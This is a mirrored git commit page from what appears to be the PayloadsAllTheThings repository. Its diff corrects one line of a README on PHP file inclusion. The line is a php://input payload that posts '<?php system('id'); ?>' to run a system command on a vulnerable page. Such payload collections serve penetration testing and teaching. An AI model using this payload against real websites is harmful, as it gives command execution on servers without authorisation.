mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 09:25:26 +00:00
Update README.md
This commit is contained in:
parent
fd99da6c06
commit
59d0020c86
@ -186,7 +186,7 @@ Specify your payload in the POST parameters
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php://input
|
||||
POST DATA: <? system('id'); ?>
|
||||
POST DATA: <?php system('id'); ?>
|
||||
```
|
||||
|
||||
### Wrapper phar://
|
||||
|
Loading…
Reference in New Issue
Block a user